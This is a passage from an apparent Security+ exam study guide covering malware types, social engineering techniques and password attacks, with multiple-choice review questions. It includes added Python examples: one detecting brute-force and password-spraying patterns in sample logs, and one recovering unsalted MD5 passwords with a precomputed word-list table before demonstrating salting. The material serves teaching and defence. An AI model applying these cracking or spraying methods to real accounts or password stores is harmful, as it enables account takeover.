Bloatware is simply unwanted software installed on systems by vendors or as part of software packages. Bloatware takes up resources like disk space, memory, and CPU cycles. It isn't truly malicious software but is often vulnerable to attack and can allow actual malicious software to gain access to systems. Bloatware is typically removed by uninstalling it.

Finally, there are many ways to fight malware, from antivirus and endpoint detection and response tools to configuration and patching.
Awareness is often the most effective tool in an organization's arsenal, as it can help prevent attacks, can allow responses to occur more quickly, and can help limit the impact of human mistakes throughout malware life cycles and attacks.

Exam Essentials

Understand and explain the different types of malware. Malware includes ransomware, Trojans, worms, spyware, bloatware, viruses, keyloggers, logic bombs, and rootkits. Each type of malware has distinctive elements, and security analysts need to know what identifies each type of malware, how to identify it, what controls are commonly deployed against it, and what to do if you encounter it.

Explain common indicators of malicious activity associated with malware types. Indicators of compromise associated with malware vary based on the type of malware and how it is designed and used. Common examples of IoCs associated with malware include command and control (C&C) traffic patterns, IP addresses, hostnames, and domains. Use of system utilities in unexpected ways, lateral movement between systems, creation of files and directories, encryption of files, and data exfiltration are also commonly seen, particularly with Trojans and rootkits. Signatures for malware are commonly used to identify specific files associated with given malware packages, although malware writers use defensive techniques intended to make this harder.

Understand the methods to mitigate malware. Malware may require specialized techniques and processes to remove it or to deal with the impact of the malware. Techniques range from manual removal to the use of tools to identify and remove malicious files, and often rely on reinstallation of a system or restoration from a known good backup to ensure all malware is removed.

Review Questions

1. Ryan wants to prevent logic bombs created by insider threats from impacting his organization. What technique will most effectively limit the likelihood of logic bombs being put in place?
   A. Deploying antivirus software
   B. Using a code review process
   C. Deploying endpoint detection and response (EDR) software
   D. Disabling autorun for USB drives

2. Yasmine believes that her organization may be dealing with an advanced rootkit and wants to write IoC definitions for it. Which of the following is not likely to be a useful IoC for a rootkit?
   A. File hashes
   B. Command and control domains
   C. Pop-ups demanding a ransom
   D. Behavior-based identifiers

3. Nathan works at a school and notices that one of his staff appears to have logged in and changed grades for a single student to higher grades, even in classes that staff member is not responsible for. When asked, the staff member says that they did not perform the action. Which of the following is the most likely way that a student could have gotten access to the staff member's password?
   A. A keylogger
   B. A rootkit
   C. Spyware
   D. A logic bomb

4. Amanda notices traffic between her systems and a known malicious host on TCP port 6667. What type of traffic is she most likely detecting?
   A. Command and control
   B. Spyware
   C. A worm
   D. A hijacked web browser

5. Mike discovers that attackers have left software that allows them to have remote access to systems on a computer in his company's network. How should he describe or classify this malware?
   A. A worm
   B. Crypto malware
   C. A Trojan
   D. A backdoor

6. What is the primary impact of bloatware?
   A. Consuming resources
   B. Logging keystrokes
   C. Providing information about users and devices to third parties
   D. Allowing unauthorized remote access

7. What type of malware is used to gather information about a user's browsing habits and system?
   A. A Trojan
   B. Bloatware
   C. Spyware
   D. A rootkit

8. Matt uploads a malware sample to a third-party malware scanning site that uses multiple antimalware and antivirus engines to scan the sample. He receives multiple different answers for what the malware package is. What has occurred?
   A. The package contains more than one piece of malware.
   B. The service is misconfigured.
   C. The malware is polymorphic and changed while being tested.
   D. Different vendors use different names for malware packages.

9. Nancy is concerned that there is a software keylogger on the system she's investigating. What best describes data that may have been stolen?
   A. All files on the system
   B. All keyboard input
   C. All files the user accessed while the keylogger was active
   D. Keyboard and other input from the user

10. A system in Elaine's company has suddenly displayed a message demanding payment in Bitcoin and claiming that the data from the system has been encrypted. What type of malware has Elaine likely encountered?
   A. Worms
   B. A virus
   C. Ransomware
   D. Rootkit

11. Rick believes that a system he is responsible for has been compromised with malware that uses a rootkit to obtain and retain access to the system. When he runs an antimalware tool's scanner, the system doesn't show any malware. If he has other data that indicates the system is infected, what should his next step be if he wants to determine what malware may be on the system?
   A. Rerun the antimalware scan.
   B. Mount the drive on another system and scan it that way.
   C. Disable the system's antivirus because it may be causing a false negative.
   D. The system is not infected and he should move on.

12. A recently terminated developer from Jaya's organization has contacted the organization claiming that they left code in an application that they wrote that will delete files and bring the application down if they are not employed by the company. What type of malware is this?
   A. Ransomware
   B. Extortionware
   C. A logic bomb
   D. A Trojan

13. Selah wants to ensure that malware is completely removed from a system. What should she do to ensure this?
   A. Run multiple antimalware tools and use them to remove all detections.
   B. Wipe the drive and reinstall from known good media.
   C. Use the delete setting in her antimalware software rather than the quarantine setting.
   D. There is no way to ensure the system is safe and it should be destroyed.

14. What is the key difference between a worm and a virus?
   A. What operating system they run on
   B. How they spread
   C. What their potential impact is
   D. The number of infections

15. Ben wants to analyze Python code that he believes may be malicious code written by an employee of his organization. What can he do to determine if the code is malicious?
   A. Run a decompiler against it to allow him to read the code
   B. Open the file using a text editor to review the code
   C. Test the code using an antivirus tool
   D. Submit the Python code to a malware testing website

16. Which of the following defenses is most likely to prevent Trojan installation?
   A. Installing patches for known vulnerabilities
   B. Preventing downloads from application stores
   C. Preventing the use of USB drives
   D. Disabling autorun from USB drives

17. Jason's security team reports that a recent WordPress vulnerability seems to have been exploited by malware and that their organization's entire WordPress service cluster has been infected. What type of malware is most likely involved if a vulnerability in the software was exploited over the network?
   A. A logic bomb
   B. A Trojan
   C. A worm
   D. A rootkit

18. Hui's organization recently purchased new Windows computers from an office supply store. The systems have a number of unwanted programs on them that load at startup that were installed by the manufacturer. What type of software is this?
   A. Viruses
   B. Trojans
   C. Spyware
   D. Bloatware

19. What type of malware connects to a command and control system, allowing attackers to manage, control, and update it remotely?
   A. A bot
   B. A drone
   C. A vampire
   D. A worm

20. Randy believes that a system that he is responsible for was infected after a user picked up a USB drive and plugged it in. The user claims that they only opened one file on the drive to see who might own it. What type of malware is most likely involved?
   A. A virus
   B. A worm
   C. A Trojan
   D.
A spyware tool Chapter 4 Social Engineering and Password Attacks THE COMPTIA SECURITY+ EXAM OBJECTIVES COVERED IN THIS CHAPTER INCLUDE: Domain 2.0: Threats, Vulnerabilities, and Mitigations 2.2. Explain common threat vectors and attack surfaces. Human vectors/social engineering (Phishing, Vishing, Smishing, Misinformation/disinformation, Impersonation, Business email compromise, Pretexting, Watering hole, Brand impersonation, Typosquatting). 2.4. Given a scenario, analyze indicators of malicious activity. Password attacks (Spraying, Brute force) Social engineering techniques focus on the human side of information security. Using social engineering techniques, security professionals and attackers can accomplish a variety of tasks ranging from acquiring information to gaining access to buildings, systems, and networks. This chapter explores social engineering techniques and related practices, from phishing to typosquatting. We discuss the principles that underlie social engineering attacks, as well as how modern influence campaigns use social engineering concepts and social media to sway opinions and reactions. Social engineering and phishing attacks often precede password attacks, and later in this chapter you will review password attack methods like brute-force attacks and password spraying. Social Engineering and Human Vectors Social engineering is the practice of manipulating people through a variety of strategies to accomplish desired actions. Social engineers work to influence their targets to take actions that they might not otherwise have taken. A number of key principles are leveraged to successfully social engineer an individual. Although the list of principles and their names vary depending on the source you read, a few of the most common are: Authority, which relies on the fact that most people will obey someone who appears to be in charge or knowledgeable, regardless of whether or not they actually are. 
A social engineer using the principle of authority may claim to be a manager, a government official, or some other person who would have authority in the situation they are operating in.

Intimidation relies on scaring or bullying an individual into taking a desired action. The individual who is targeted will feel threatened and respond by doing what the social engineer wants them to do.

Consensus-based social engineering uses the fact that people tend to want to do what others are doing to persuade them to take an action. A consensus-based social engineering attack might point out that everyone else in a department has already clicked on a link, or might provide fake testimonials about a product, making it look safe. Consensus is called “social proof” in some categorization schemes.

Scarcity is used for social engineering in scenarios that make something look more desirable because it may be the last one available.

Familiarity-based attacks rely on you liking the individual or even the organization the individual is claiming to represent.

Trust, much like familiarity, relies on a connection with the individual being targeted. Unlike familiarity, which relies on targets thinking that something is normal and thus familiar, social engineers who use this technique work to build a connection with their targets so that the targets will take the actions the social engineer wants them to take.

Urgency relies on creating a feeling that the action must be taken quickly for some reason or reasons.

You may have noticed that each of these social engineering principles works because it causes the target to react to a situation, and that many make the target nervous or worried about a result or scenario. Social engineering relies on human reactions, and we are most vulnerable when we are responding instead of thinking clearly. Many, if not most, social engineering efforts in the real world combine multiple principles into a single attack.
If a penetration tester calls claiming to be a senior leader's assistant in another part of your company (thus triggering authority and possibly familiarity responses), then insists that the senior leader has an urgent need (urgency) and informs the target that they could lose their job if they don't act immediately (intimidation), they are more likely to succeed in many cases than if they used only one principle. A key part of social engineering is understanding the target, how humans react, and how stress reactions can be leveraged to meet a goal.

Exam Note
The Security+ exam doesn't expect you to be able to categorize attacks based on the principles they rely on, but those principles are extremely helpful as a tool to think about why an attack might succeed and how it can be prevented or limited.

Social Engineering Techniques
Social engineering involves more than the principles you just read. There are both technical and nontechnical attacks that leverage those principles to get the results that attackers and penetration testers want. As a security professional, you need to be aware of these techniques, what they involve, and what makes each of them different from the others.

Phishing
Phishing is a broad term used to describe the fraudulent acquisition of information, often focused on credentials like usernames and passwords, as well as sensitive personal information like credit card numbers and related data. Phishing is most often done via email, but a wide range of phishing techniques exist, including smishing, which is phishing via SMS (text) messages, and vishing, or phishing via telephone. Specific terms are also used for specifically targeted phishing attempts. Spear phishing targets specific individuals or groups in an organization in an attempt to gather desired information or access.
Whaling, much like spear phishing, targets specific people, but whaling is aimed at senior employees like CEOs and CFOs—“big fish” in the company, thus the term whaling.

Like most social engineering techniques, one of the most common defenses against phishing of all types is awareness. Teaching staff members about phishing and how to recognize and respond to phishing attacks, and even staging periodic exercises, are all common means of decreasing the risk of successful phishing attacks. Technical means also exist, including filtering that helps prevent phishing using reputation tools, keyword and text pattern matching, and other technical methods of detecting likely phishing emails, calls, or texts.

Vishing
Vishing is phishing accomplished via voice or voicemail messages. Vishing attacks rely on phone calls to social-engineer targets into disclosing personal, financial, or other useful information, or into sending funds. Common vishing scams include requests to help a relative or friend in another country, leading to wire fraud; various tax scams, particularly during tax season in the United States; threats of law enforcement action; and requests for a staff member to perform a task for a senior executive. Like many social engineering efforts, vishing often relies on a sense of urgency, with an imminent threat or issue that needs to be resolved. Vishers may attempt to acquire personal information, and frequently present themselves as authorities.

Smishing
Smishing relies on text messages as part of the phishing scam. Whereas other scams often rely on targets disclosing information via social engineering, smishing scams frequently attempt to get users to click on a link in a text message. The link may take them to a fake site to capture credentials, may attempt to infect the recipient's phone with malware, may request multifactor authentication (MFA) information like an SMS code, or could target some other information or action.
Smishing attacks rely on pretexts similar to those of many other phishing attacks, with attempts to build trust or urgency, or to establish authority, often included as part of the messages.

Misinformation and Disinformation
As cyberwarfare and traditional warfare have continued to cross over in deeper and more meaningful ways, online influence campaigns—which have traditionally focused on social media, email, and other online-centric mediums—have become common and have increasingly been used by governments and other groups as part of misinformation and disinformation campaigns. A very visible example was the influence campaigns targeting political campaigns that were a major topic in the U.S. 2016 and 2020 elections, resulting in a growing public awareness of the issue.

It can be a bit confusing distinguishing between misinformation and disinformation. Remember that misinformation is incorrect information, often resulting from getting facts wrong. Disinformation is incorrect, inaccurate, or outright false information that is intentionally provided to serve an individual's or organization's goals.

Individuals and organizations conduct influence campaigns to turn public opinion in directions of their choosing. Even advertising campaigns can be considered a form of influence campaign, but in general, most influence campaigns in the context of the Security+ exam are associated with disinformation and misinformation campaigns.

Another term you may encounter in this context is “malinformation.” These three types of information are sometimes abbreviated as “MDM”: misinformation, disinformation, and malinformation. CISA provides a guide on them at www.cisa.gov/sites/default/files/publications/mdm-incident-response-guide_508.pdf.

CISA recommends a five-step “TRUST” process to counter misinformation and disinformation campaigns:
1. Tell your story.
2. Ready your team.
3. Understand and assess MDM.
4. Strategize response.
5. Track outcomes.
Misinformation campaigns can appear quickly, and their source can be hard to identify. That means that organizations must monitor for misinformation and be ready to counter it using actions like those described in the TRUST model. CISA's recommendations for preparedness include assessing the information environment, identifying vulnerabilities, fortifying communication channels, engaging in proactive communications, and developing an incident response plan.

Impersonation
Pretending to be someone else, or impersonation, is a key tool in a social engineer's toolkit, and like all of the other social engineering techniques we have discussed, it can be used for malicious purposes. Each of these techniques combines the willingness of the target or targets to believe the impersonator with the principles of social engineering to create a scenario where the social engineer will get the access, data, or other results they desire.

Identity fraud, or identity theft, is the use of someone else's identity. Although identity fraud is typically used for financial gain by malicious actors, identity fraud may be used as part of penetration tests or other security efforts as well. In fact, in some cases impersonation, where you act as if you are someone else, can be a limited form of identity fraud. In other cases, impersonation is less specific, and the social engineer or attacker who uses it may simply pretend to be a delivery driver or an employee of a service provider rather than claiming a specific identity.

Business Email Compromises
Business email compromise, often called BEC, relies on using apparently legitimate email addresses to conduct scams and other attacks. Common examples of this include invoice scams, gift card scams, data theft, and account compromise/account access attacks.
As with other types of email-focused scams and attacks, there are multiple methods that may be used to create legitimate-appearing email, including:
Using compromised accounts
Sending spoofed emails
Using common fake-but-similar domain techniques
Using malware or other tools

Microsoft provides a detailed writeup on BEC as part of their Security 101 at www.microsoft.com/en-us/security/business/security-101/what-is-business-email-compromise-bec. You may sometimes find BEC called EAC, or email account compromise, a less specific term than business email compromise. Mitigation methods for business email compromise commonly involve multifactor authentication, awareness training, and policies that help to support appropriate use and behaviors.

Pretexting
Pretexting is the process of using a made-up scenario to justify why you are approaching an individual. Pretexting is often used as part of impersonation efforts to make the impersonator more believable. An aware target can ask questions or require verification that can help defeat pretexting and impersonation attacks. In many cases, simply making a verification call can defeat such attempts.

Watering Hole Attacks
Watering hole attacks use websites that targets frequent to attack them. These frequently visited sites act like a watering hole for animals and allow the attackers to stage an attack, knowing that the victims will visit the site. Once they know what site their targets will use, attackers can focus on compromising it, either by targeting the site directly or by deploying malware through other means such as an advertising network.

Brand Impersonation
Another type of phishing attack is brand impersonation or brand spoofing. This common form of attack uses emails that are intended to appear to be from a legitimate brand, relying on name recognition and even using email templates used by the brand itself.
Brand impersonation is often used in attempts to get users to log into their existing accounts, particularly for stores and banks. These emails may also request payment, gather passwords or other sensitive information, or may simply have malware attached with instructions to access a file or run an executable. As with scam email of all sorts, the quality of brand impersonation email varies from email that is indistinguishable from legitimate messages to poorly constructed scams like the PayPal scam shown in Figure 4.1.

FIGURE 4.1 Brand impersonation email

Typosquatting
Typosquatters register URLs that are misspelled or slightly off from, but similar to, a legitimate site's URL to conduct typosquatting attacks. Typosquatters rely on the fact that people will mistype URLs and end up on their sites, thus driving ad traffic or even sometimes using the typo-based website to drive sales of similar but not legitimate products. Typosquatting is hard to prevent, but organizations often register the most common typos for their domains if they're concerned about it. You can see an example of this by visiting amason.com, which redirects to Amazon.com!

A related form of attack is known as pharming. Unlike typosquatting, pharming relies either on changing a system's hosts file (which is the first reference a system checks when looking up DNS entries) or on active malware on the system that changes the system's DNS servers. A successful pharming attack using a hosts-file-based technique will modify the hosts file and redirect unsuspecting victims to a lookalike site.

Password Attacks
Although social engineering is often used to acquire passwords or access, there are other ways to attack passwords as well. Everything from trying password after password in a brute-force attack, to technical attacks that leverage precomputed password hashes in lookup systems to check acquired password hashes against a known database, can help attackers and penetration testers attack passwords.
The Security+ exam focuses on two password-related attacks:

Brute-force attacks, which iterate through passwords until they find one that works. Actual brute-force methods can be more complex than just using a list of passwords and often involve word lists that use common passwords, words specifically picked as likely to be used by the target, and modification rules to help account for complexity rules. Regardless of how elegant or well thought out their input is, in the end, brute force is simply a process that involves trying different variations until it succeeds.

Password spraying attacks are a form of brute-force attack that attempts to use a single password or small set of passwords against many accounts. This approach can be particularly effective if you know that a target uses a specific default password or a set of passwords. For example, if you were going to attack a sports team's fan website, common chants for the fans, names of well-known players, and other common terms related to the team might be good candidates for a password spraying attack.

Dictionary attacks are yet another form of brute-force attack that uses a list of words for their attempts. Commonly available brute-force dictionaries exist, and tools like John the Ripper, a popular open source password cracking tool, have word lists (dictionaries) built in. Many penetration testers build their own custom dictionaries as part of their intelligence gathering and reconnaissance processes.

Exam Note
The SY0-701 Exam Outline focuses on just two types of password attacks: spraying and brute force. Dictionary attacks and the use of rainbow tables remain common as well, and help provide context for password attacks in general. We've included them here so you'll have the full picture—they just shouldn't show up on the exam.
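The two attack shapes just described leave different fingerprints in authentication logs: brute force piles failures onto one account, while spraying spreads one or two failures across many accounts and so never trips a per-account lockout. The following detection logic is an added example written for this chapter, not code from the book; the log line format, IP addresses, account names, and thresholds are all constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed auth-log format (not from any real product):
# "<timestamp> auth_fail user=<account> src=<source ip>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+auth_fail\s+user=(?P<user>\S+)\s+src=(?P<src>\S+)$"
)

# Constructed sample: one source hammers "admin" (brute force), a second
# source tries a single guess against each of six accounts (spraying), and a
# third is a user who mistyped a password twice (benign).
SAMPLE_LOG = """\
2024-03-01T08:00:01 auth_fail user=admin src=203.0.113.5
2024-03-01T08:00:02 auth_fail user=admin src=203.0.113.5
2024-03-01T08:00:03 auth_fail user=admin src=203.0.113.5
2024-03-01T08:00:04 auth_fail user=admin src=203.0.113.5
2024-03-01T08:00:05 auth_fail user=admin src=203.0.113.5
2024-03-01T08:00:06 auth_fail user=admin src=203.0.113.5
2024-03-01T08:01:10 auth_fail user=alice src=198.51.100.7
2024-03-01T08:01:11 auth_fail user=bob src=198.51.100.7
2024-03-01T08:01:12 auth_fail user=carol src=198.51.100.7
2024-03-01T08:01:13 auth_fail user=dave src=198.51.100.7
2024-03-01T08:01:14 auth_fail user=erin src=198.51.100.7
2024-03-01T08:01:15 auth_fail user=frank src=198.51.100.7
2024-03-01T08:02:00 auth_fail user=alice src=192.0.2.9
2024-03-01T08:02:07 auth_fail user=alice src=192.0.2.9
"""


def parse_failures(log_text):
    """Return {src_ip: {account: failure_count}} from auth_fail lines.

    Lines that do not match the format are ignored rather than raising, so a
    noisy log with other event types can be fed in unchanged.
    """
    failures = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        match = LINE_RE.match(line.strip())
        if match:
            failures[match["src"]][match["user"]] += 1
    return failures


def classify_source(per_account, brute_threshold=5, spray_accounts=5,
                    spray_max_per_account=2):
    """Label one source's failures as brute_force, password_spray or benign.

    brute_force:    the same account fails at least brute_threshold times.
    password_spray: at least spray_accounts distinct accounts, none failing
                    more than spray_max_per_account times. A per-account
                    lockout rule never fires on this pattern, which is why a
                    per-source (or per-window) rule is needed to see it.
    Real deployments would evaluate these counts inside a time window and
    also across sources, since spraying is often distributed over many IPs.
    """
    worst_account = max(per_account.values())
    if worst_account >= brute_threshold:
        return "brute_force"
    if len(per_account) >= spray_accounts and worst_account <= spray_max_per_account:
        return "password_spray"
    return "benign"


def detect(log_text, **thresholds):
    """Classify every source IP that produced at least one failure."""
    return {src: classify_source(accounts, **thresholds)
            for src, accounts in parse_failures(log_text).items()}


if __name__ == "__main__":
    for src, verdict in detect(SAMPLE_LOG).items():
        print(f"{src:15} {verdict}")
```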
Regardless of the password attack mechanism, an important differentiator between attack methods is whether they occur online, and thus against a live system that may have defenses in place, or offline against a compromised or captured password store. If you can capture hashed passwords from a password store, tools like rainbow tables can be very useful and will typically be far faster than brute-force attacks. Rainbow tables are an easily searchable database of precomputed hashes using the same hashing methodology as the captured password file. Thus, if you captured a set of passwords that were hashed using MD5, you could use a precomputed MD5 rainbow table to simply look up the hashed passwords.

If you're not familiar with the concept of hashing, now is a good time to review it. A hash is a one-way cryptographic function that takes an input and generates a unique and repeatable output from that input. It should be infeasible to find two inputs that generate the same hash, and a hash should not be reversible, so the original input cannot be derived from the hash. Of course, hash collisions do occur, which leads to new hashing algorithms being designed and used.

Rainbow tables don't allow you to break hashes, but they brute-force the solution by using computational power to create a database where hashes and the values that created them can be looked up. You still aren't reversing the hash, but you are able to figure out what plain text leads to that hash being created!

If you have captured a password file, you can also use a password cracker against it. Password crackers like John the Ripper, shown in Figure 4.2, attempt to crack passwords by trying brute-force and dictionary attacks against a variety of common password storage formats.

FIGURE 4.2 John the Ripper

Learning how to use tools like John the Ripper can help you understand both password cracking and how passwords are stored.
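To make the precomputed-table idea concrete, and to show why the salt and pepper mentioned later in this section defeat it, here is an added example that is not from the book: a plain lookup table stands in for a rainbow table (a real one stores hash chains to save space, but the lookup-not-reversal effect is the same), and the word list, account names, and captured MD5 values are all constructed. SHA-256 is used for the salted variant only so the example runs from the standard library; OWASP's cheat sheet recommends a dedicated password hashing function such as Argon2 or bcrypt.

```python
import hashlib
import hmac
import os


def md5_hex(data: bytes) -> str:
    """Unsalted MD5, the legacy storage format the text uses as its example."""
    return hashlib.md5(data).hexdigest()


def build_lookup_table(wordlist):
    """Precompute the hash of every candidate once (constructed stand-in for a
    rainbow table). The cost is paid up front; each captured hash then costs
    one dictionary lookup instead of a fresh brute-force run."""
    return {md5_hex(word.encode()): word for word in wordlist}


def lookup_hashes(table, captured_hashes):
    """Map each captured hash to the plaintext that produced it, or None."""
    return {h: table.get(h) for h in captured_hashes}


def hash_password(password, salt=None, pepper=b""):
    """Salted (and optionally peppered) hash for storage.

    The salt is random per user and stored next to the digest; the pepper is a
    site-wide secret kept outside the password store. Because every user's
    digest depends on a different salt, one precomputed table no longer covers
    the whole password file: an attacker would need a table per salt.
    """
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.sha256(salt + pepper + password.encode()).hexdigest()
    return salt, digest


def verify_password(password, salt, digest, pepper=b""):
    """Recompute with the stored salt and compare in constant time."""
    _, candidate = hash_password(password, salt, pepper)
    return hmac.compare_digest(candidate, digest)


# Constructed word list and a constructed "captured" unsalted MD5 password file.
WORDLIST = ["password", "123456", "letmein", "qwerty", "ninja"]
CAPTURED_MD5 = {
    "alice": md5_hex(b"letmein"),
    "bob": md5_hex(b"ninja"),
    "carol": md5_hex(b"correct horse battery staple"),  # not in the word list
}


def recover_unsalted(captured=CAPTURED_MD5, wordlist=WORDLIST):
    """Table lookup against unsalted MD5: returns {user: plaintext_or_None}."""
    table = build_lookup_table(wordlist)
    found = lookup_hashes(table, captured.values())
    return {user: found[h] for user, h in captured.items()}


def salted_digests_differ(password="letmein"):
    """Same password for two users, two random salts: the stored digests differ,
    so a single precomputed table cannot serve both."""
    _, digest_one = hash_password(password)
    _, digest_two = hash_password(password)
    return digest_one != digest_two


if __name__ == "__main__":
    print(recover_unsalted())       # alice and bob recovered, carol is None
    print(salted_digests_differ())  # True
```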
You can find a variety of exercises at https://openwall.info/wiki/john/tutorials that will get you started.

Password cracking tools like John the Ripper can also be used as password assessment tools. Some organizations continue to periodically test for weak and easily cracked passwords by using a password cracker on their password stores. In many cases, use of MFA paired with password complexity requirements has largely replaced this assessment process, and that trend is likely to continue.

Of course, not every system is well maintained, and a penetration tester's or attacker's favorite opportunity is finding plain-text or unencrypted passwords to acquire. Without some form of protection, passwords that are just maintained in a list can be easily acquired and reused by even the most casual of attackers. As noted earlier, using a strong password hashing mechanism, as well as techniques like using a salt and a pepper (additional data added to passwords before they are hashed, making it harder to use tools like rainbow tables), can help protect passwords. In fact, best practices for password storage don't rely on encryption; they rely on passwords never being stored and instead using a well-constructed password hash to verify passwords at login. If you want to learn more about secure password storage, OWASP maintains a great cheat sheet at https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html.

Summary
Social engineering techniques focus on human reactions and psychology to gather information and to perform attacks against individuals and organizations. A broad range of human vectors are used to accomplish attackers' goals. Security professionals need to be aware of how social engineering is leveraged in attacks like phishing, impersonation, misinformation and disinformation, and other efforts. Each technique has its own distinctive set of social engineering techniques and impacts that help make it unique.
Test takers need to be familiar with phishing, vishing, business email compromise, pretexting, watering hole, brand impersonation, and typosquatting attacks, as well as the broad categories of phishing, impersonation, and misinformation. Test takers need to be aware of brute-force password attacks that repeatedly try a variety of usernames and passwords until they succeed. You'll also need to know about spraying, a type of brute-force attack that uses a list of usernames and common passwords to try to gain access to accounts.

Exam Essentials
Many techniques are used for social engineering. Many adversarial and security techniques rely on social engineering. Phishing and its related techniques of smishing and vishing seek to gain information using social engineering techniques. Misinformation and disinformation campaigns are used to change opinions and to shift narratives. Malicious actors will impersonate whomever they need to acquire information, to gain access or credentials, or to persuade individuals to take action. Pretexting is often used with impersonation to provide a believable reason for the action or request. Business email compromise and brand impersonation are both used to make malicious emails and other communications appear legitimate and thus more likely to fool targets into taking the desired action. Watering hole attacks focus on sites that targets frequently visit, while typosquatters rely on users who make typos while entering URLs.

Passwords can be acquired and cracked in many ways. Password attacks can be conducted both online against live systems and offline using captured password stores. Brute-force attacks like spraying and dictionary attacks, as well as password cracking, can recover passwords in many circumstances. Unencrypted or plain-text passwords and improper or insecure storage methods like the use of MD5 hashes make attacks even easier for attackers who can access them.

Review Questions
1. Joseph receives an email notifying him that he needs to change his password due to a recent account issue. He notices that the email links him to a website using the domain amaz0n.com. What type of attack should he describe this as?
A. Typosquatting
B. Phishing
C. Smishing
D. A watering hole attack

2. When you combine phishing with voicemail, it is known as:
A. Whaling
B. Spoofing
C. Spooning
D. Vishing

3. While reviewing her logs, Michele notices that a remote system has attempted to log into her server via SSH using the username admin and a variety of passwords like “password” and “ninja.” What type of attack has Michele noticed?
A. A brute-force attack
B. Shoulder surfing
C. An on-path attack
D. Pretexting

4. Joanna wants to detect password spraying attacks. What type of rule should she deploy through her security systems?
